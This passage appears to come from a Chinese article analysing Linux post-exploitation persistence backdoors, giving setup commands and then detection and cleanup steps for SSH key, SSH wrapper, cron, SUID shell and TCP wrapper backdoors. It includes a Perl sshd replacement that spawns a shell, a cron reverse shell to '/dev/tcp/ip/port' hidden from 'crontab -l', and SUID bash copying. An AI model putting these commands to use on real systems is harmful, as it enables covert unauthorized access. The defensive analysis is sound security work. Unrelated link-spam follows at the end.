ssh无密码登录要使用公钥与私钥 。linux下可以用ssh-keygen生成公钥/私钥,即利用密钥认证登录 。
2
公钥免密登录后门实现
1)在攻击机上生成公钥文件,“回车”默认配置 。
【Linux后渗透常见后门驻留方式分析】ssh-keygen -t rsa
2)将攻击机上的id_rsa.pub文件拷贝至靶机 。
1.ftp、scp等工具上传至靶机或者U盘植入;2.将公钥文件放置vps服务器,然后靶机用wget/curl下载;3.各类可用于远程传输的工具均可(如:nc) 。
3)攻击机ssh连接靶机,无需密码认证 。
文章插图
图14
3
公钥免密登陆后门检测响应
1)查看系统当前登录状态 。
文章插图
图15
六
SSH wrApper后门
1
SSH wrapper后门原理
Linux中init首先启动的是/usr/sbin/sshd,原始的sshd监听端口建立了tcp连接后,会fork一个子进程处理具体工作 。如果这个子进程的标准输入输出已被重定向,那么getpeername能获取到客户端的TCP端口,将会派生给执行sh命令执行的权限 。简而言之就是反弹shell,与常见的反弹shell不同的是,SSH wrapper后门通过长连接反弹shell的方式,使得攻击者在退出终端后仍然能进行连接 。
2
SSH wrapper后门实现
1)在靶机(服务端)中执行监听,终端中执行 。
cd /usr/sbin/mv sshd ../bin/echo '#!/usr/bin/perl' >sshdecho 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshdecho 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshdchmod u+x sshd/etc/init.d/sshd restart
2)在攻击机(客户端)中执行连接命令,获得一个命令执行权限的shell 。
文章插图
图16
3
SSH wrapper后门检测响应
1)查看sshd文件修改状况 。
ls -al /usr/sbin/sshdcat /usr/sbin/sshd
文章插图
图17
2)清除SSH wrapper后门 。
通过重装ssh服务清除SSH wrapper后门 。
七
Cron后门
1
Cron后门原理
crontab命令用于设置周期性被执行的指令,可以把cron设置为开机时自动启动 。攻击者将恶意代码或程序隐藏在系统磁盘中,并由计划任务调用时启动它们 。
2
Cron后门实现
1)平平无奇的Cron后门 。
(crontab -l;echo '*/1 * * * * /bin/bash /tmp/1.sh;/bin/bash --noprofile -i')|crontab -
能用crontab-l命令查看到具体内容 。
文章插图
图18
2)隐蔽的Cron后门 。
(crontab -l;printf "*/1 * * * * bash -i >& /dev/tcp/ip/port 0>&1;/bin/bash --noprofile -i;rno crontab for `whoami`%100cn")|crontab -
用crontab-l命令则无法查看到具体内容 。
文章插图
图19
这是因为利用到了cat工具的特性 。cat默认支持一些如r回车符、n换行符、f换页符等,也就是这些符号导致的能够隐藏命令 。
3)攻击机获得shell连接 。
文章插图
图20
3
Cron后门检测响应
1)查看可疑的计划任务 。
crontab -e
2)使用vim命令在cron创建的文件下查找并清除恶意代码 。
文章插图
图21
八
SUID Shell后门
1
SUID Shell后门原理
Suid shell是一种可用于以拥有者权限运行的shell 。攻击者将原有的bash进程copy并隐藏,给予可执行的权限,达到隐藏后门的目的 。
2
SUID Shell后门实现
1)在终端中执行如下命令 。
# cp /bin/bash /tmp/shell# chmod u+s /tmp/shell用普通权限用户执行shell程序 。$ /tmp/shell -p
文章插图
图22
3
SUID Shell后门检测响应
1)在Linux中查找SUID设置的文件 。
文章插图
图23
2)取消shell程序的s权限 。
chmod u-s /tmp/shell
九
Tcp wrapper后门
1
Tcp wrapper后门原理
TCP_Wrappers(一个工作在应用层的安全工具),通过修改配置文件hosts.allow,实现tcpd(Tcp Wrapper的守护进程)的截获请求 。每当有ssh的连接请求时,如若请求满足配置文件中的规则,则放行,否则中断连接,配置文件中可配置执行命令 。
推荐阅读
- 网站被挂马怎么解决
- Linux 常见异常分析,请收好这份排查指南
- 前瞻:Xfce 4.18 主要新功能 | Linux 中国
- 刘备为什么说是中山靖王之后,刘备自称是汉中山靖王之后那西汉第一任中山靖王是谁-
- 白冰|白冰官宣结婚生子后首更!疑穿睡衣去探店,称私生活无须跟谁交代
- 央视|水均益29岁女儿当央视记者!清华读研美过明星且前凸后翘身材性感
- 电影|已婚名导上床就给戏,曝光后震惊全网
- |初冬钓深钓远势在必行?钓位留心“潜在财富”,让你今后钓鱼受益
- (2022已更新中 灿谷汽车金融官方认证股份有限公司客服服务售后服务客服热线号码)
- (2022已更新中 灿谷金融官方认证股份有限公司客服服务售后服务客服热线号码)